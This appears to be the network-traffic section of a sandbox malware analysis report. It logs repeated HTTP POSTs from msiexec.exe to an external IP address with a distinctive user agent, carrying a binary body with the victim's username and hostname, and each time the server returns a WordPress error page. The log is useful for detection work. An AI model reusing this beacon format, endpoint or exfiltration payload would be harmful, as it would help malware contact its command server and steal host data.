                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:08.226350069 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:08.226362944 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.449752137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:08.382426977 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:08.387339115 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:10.927911997 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:08 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:10.927932024 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:10.927943945 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:10.927954912 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.449753137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:11.076231956 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:11.081114054 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:13.629993916 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:11 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:13.630017996 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:13.630032063 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.449754137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:13.772979975 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:13.777858973 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:16.314459085 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:14 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:16.314480066 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:16.314491034 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.449755137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:16.460316896 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:16.465295076 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:19.040237904 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:16 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:19.040257931 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:19.040275097 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.449756137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:19.194720030 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:19.199610949 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:21.852612019 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:19 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:21.852628946 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
